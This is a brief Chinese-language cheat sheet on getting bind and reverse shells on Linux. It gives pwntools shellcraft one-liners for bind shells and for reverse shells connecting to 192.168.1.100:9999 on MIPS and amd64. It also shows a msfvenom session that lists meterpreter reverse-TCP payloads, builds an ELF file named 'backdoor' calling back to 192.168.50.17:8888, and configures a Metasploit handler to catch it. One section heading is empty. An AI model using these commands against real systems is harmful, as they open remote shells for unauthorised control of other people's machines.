linux平台上各种量级的正连反连shell的方法

shellcode级别

shellcraft.mips.linux.bindsh(9999)
shellcraft.mips.linux.connect('192.168.1.100',9999)+shellcraft.mips.linux.dupsh()
shellcraft.amd64.linux.bindsh(9999)
shellcraft.amd64.linux.connect('192.168.1.100',9999)+shellcraft.amd64.linux.dupsh()

命令执行级别

文件级别

➜  msfvenom --list payloads | grep linux | grep meterpreter_reverse_tcp                                                            
    linux/aarch64/meterpreter_reverse_tcp               Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
    linux/armle/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
    linux/mips64/meterpreter_reverse_tcp                Run the Meterpreter / Mettle server payload (stageless)
    linux/mipsbe/meterpreter_reverse_tcp                Run the Meterpreter / Mettle server payload (stageless)
    linux/mipsle/meterpreter_reverse_tcp                Run the Meterpreter / Mettle server payload (stageless)
    linux/ppc/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/ppc64le/meterpreter_reverse_tcp               Run the Meterpreter / Mettle server payload (stageless)
    linux/ppce500v2/meterpreter_reverse_tcp             Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x86/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/zarch/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
➜  msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.50.17 LPORT=8888 -f elf -o backdoor
msf5 > use exploit/multi/handler
msf5 > set payload linux/armle/meterpreter/reverse_tcp
msf5 > set LPORT 8888
msf5 > set LHOST 0.0.0.0
msf5 > run